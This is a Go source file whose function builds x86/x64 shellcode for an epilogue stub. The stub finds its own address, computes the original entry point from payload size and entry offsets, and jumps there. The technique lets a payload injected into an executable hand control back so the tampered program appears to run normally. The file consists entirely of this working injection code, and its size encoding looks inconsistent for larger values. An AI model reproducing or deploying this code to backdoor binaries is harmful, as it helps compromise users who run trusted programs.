epiloguejmp.go

1. package main
2.  
3. import(
4.     "encoding/binary"
5.     "bytes"
6. )
7.  
8. /*
9.     x64 - pEntry uint64 / oEntry uint64
10.     x86 - pEntry uint32 / oEntry uint32
11. */
12. func modEpilogue(pSize int32, pEntry interface{}, oEntry interface{}) []byte {
13.     /*
14.     ;Example of what the final payload can look like
15.     epilog := []byte{
16.         0xe8, 0x12, 0x00, 0x00, 0x00,       //call   401061 <get_eip>
17.         0x48, 0x83, 0xe8, 0x4f,             //sub    $0x4f,%rax
18.         0x48, 0x2d, 0xd1, 0x73, 0x01, 0x00, //sub    $0x173d1,%rax
19.         0x48, 0x05, 0x20, 0x5b, 0x00, 0x00, //add    $0x5b20,%rax
20.         0xff, 0xe0,                         //jmp    *%rax
21.                                             //0000000000401061 <get_eip>:
22.         0x48, 0x8b, 0x04, 0x24,             //mov    (%rsp),%rax
23.         0xc3,                               //ret
24.     }
25.     */
26.  
27.     encPsize := make([]byte, 4)
28.     binary.LittleEndian.PutUint32(encPsize, uint32(pSize))
29.     var numZeros uint32 = 0
30.     for _, b := range encPsize {
31.         if b != 0x00 {
32.             numZeros++
33.         }
34.     }
35.  
36.     var incOff uint32
37.     switch pEntry.(type) {
38.     case uint64:
39.         incOff = 0x12
40.     case uint32:
41.         incOff = 0xf
42.     }
43.     incOff += (numZeros - 1)
44.  
45.     var shellcode bytes.Buffer;
46.     shellcode.Write([]byte{0xe8}) //call instruction
47.    
48.     //encode the offset
49.     encOff := make([]byte, 4)
50.     binary.LittleEndian.PutUint32(encOff, incOff)
51.  
52.     //write offset for call instruction
53.     shellcode.Write(encOff)
54.  
55.     // (x64) - sub rax, encPsize
56.     // (x86) - sub eax, encPsize
57.     switch oEntry.(type) {
58.     case uint64:
59.         shellcode.Write([]byte{0x48, 0x83, 0xe8})
60.     case uint32:
61.         shellcode.Write([]byte{0x83, 0xe8})
62.     }
63.     shellcode.Write(encPsize[:numZeros])
64.    
65.     //  (x64) - sub rax, pEntry
66.     //  (x86) - sub eax, pEntry
67.     encPentry := make([]byte, 4)
68.     switch v := pEntry.(type) {
69.     case uint64:
70.         binary.LittleEndian.PutUint32(encPentry, uint32(v))
71.         shellcode.Write([]byte{0x48, 0x2d})
72.     case uint32:
73.         binary.LittleEndian.PutUint32(encPentry, v)
74.         shellcode.Write([]byte{0x2d})
75.     }
76.     shellcode.Write(encPentry)
77.  
78.     // (x64) - add rax, oEntry
79.     // (x86) - add eax, oEntry
80.     encOentry := make([]byte, 4)
81.     switch v := oEntry.(type) {
82.     case uint64:
83.         binary.LittleEndian.PutUint32(encOentry, uint32(v))
84.         shellcode.Write([]byte{0x48, 0x05})
85.     case uint32:
86.         binary.LittleEndian.PutUint32(encOentry, v)
87.         shellcode.Write([]byte{0x05})
88.     }
89.     shellcode.Write(encOentry)
90.  
91.     switch oEntry.(type) {
92.     case uint64:
93.         /* --- write -- */
94.         //jmp rax
95.         //mov rax, [rsp]
96.         //ret
97.         shellcode.Write([]byte{0xff, 0xe0, 0x48, 0x8b, 0x04, 0x24, 0xc3})
98.     case uint32:
99.         /* --- write -- */
100.         //jmp eax
101.         //mov eax, [esp]
102.         //ret
103.         shellcode.Write([]byte{0xff, 0xe0, 0x8b, 0x04, 0x24, 0xc3})
104.     }
105.     return shellcode.Bytes()
106. }